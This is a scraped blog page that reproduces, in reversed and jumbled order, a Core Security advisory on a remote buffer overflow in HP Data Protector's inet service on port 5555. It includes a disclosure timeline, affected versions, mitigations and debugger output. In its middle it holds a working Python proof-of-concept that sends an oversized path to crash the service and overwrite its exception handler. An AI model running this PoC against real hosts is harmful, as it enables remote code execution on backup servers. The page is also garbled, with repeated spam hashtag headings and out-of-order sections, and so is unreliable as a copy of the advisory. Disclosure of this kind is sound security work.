dynadopa.blogg.se - Hp data protector 10

#HP DATA PROTECTOR 10 UPDATE#
#HP DATA PROTECTOR 10 UPGRADE#
#HP DATA PROTECTOR 10 SOFTWARE#
#HP DATA PROTECTOR 10 CODE#

: Core requests an update on this issue, in particular Core asks the vendor for a technical analysis of the bugs, a list of affected products and versions, and the vendor's plan for providing a fix (no reply received).

#HP DATA PROTECTOR 10 SOFTWARE#

: Vendor confirms that a new case was assigned within HP Software Security Response Team (SSRT).

Publication date is temporarily set to July 5th, 2011.

: Core Security Technologies notifies the HP team of the vulnerabilities and provides the technical details.

66:8910 |MOV WORD PTR DS:,DX // copy WORDs to the stack 0041D213 |. This function does a blind copy of the string passed in the packet as a path: 0041D170 /$ 55 PUSH EBP 0041D171 |. This is part of a function inside the ntdll.dll library, however, if we look the SEH chain, we can see that the SEH handler was overwritten with the value 0x00410041 (the unicode value for "AA"): SEH chain of thread 00000578 Address SE handler 009AFF94 omniinet.00410041 00410041 A3004472 import sys import socket from struct import pack ip = sys.argv port = int(sys.argv) # default tcp port 5555 target = (ip, port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(target) path = 'A' * 5000 packet = pack('H', 0x0020) packet += pack('H', 0x0020) packet += pack('>H', 0x0020) * 4 packet += pack('H', 0x0020) packet += path packet += pack('>H', 0x0000) plen = pack('>L', len(packet)) s.send(plen + packet)īy executing this script, the omniinet.exe process crashes in the following EIP: 7C8285D3 8B0424 MOV EAX,DWORD PTR SS: 7C8285D6 8BE5 MOV ESP,EBP 7C8285D8 5D POP EBP 7C8285D9 C3 RETN

The following python script can be used to reproduce the bug.

#HP DATA PROTECTOR 10 CODE#

Technical Description / Proof of Concept Code Publication was coordinated by Carlos Sarraute. This vulnerability was discovered and researched by Nahuel C.

Enable encrypted control communication services on cell server and all clients in cell.

#HP DATA PROTECTOR 10 UPGRADE#

Upgrade to Data Protector A.06.20 or subsequent.HP has provided the following procedure to mitigate this vulnerability: The latest version of HP Data Protector is vulnerable to this issue. HP has issued a security bulletin with document ID c02872182 available through HP Support Center at. Vendor Information, Solutions and Workarounds No fixes are available at the time of publication.Ħ.Previous versions may be affected, but were not tested.HP OpenView Storage Data Protector v6.00 (running on Windows).HP OpenView Storage Data Protector v6.10 (running on Windows).HP OpenView Storage Data Protector v6.11 (running on Windows).HP OpenView Storage Data Protector v6.20 (running on Windows).The vulnerability is triggered by sending a request to port 5555 of a host running the "data protector inet" service, part of HP Data Protector. A vulnerability in HP Data Protector could allow a remote attacker to execute arbitrary code. HP Data Protector is an automated backup and recovery software for single-server to enterprise environments. Title: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability HP Data Protector EXEC_CMD Buffer Overflow Vulnerability 1.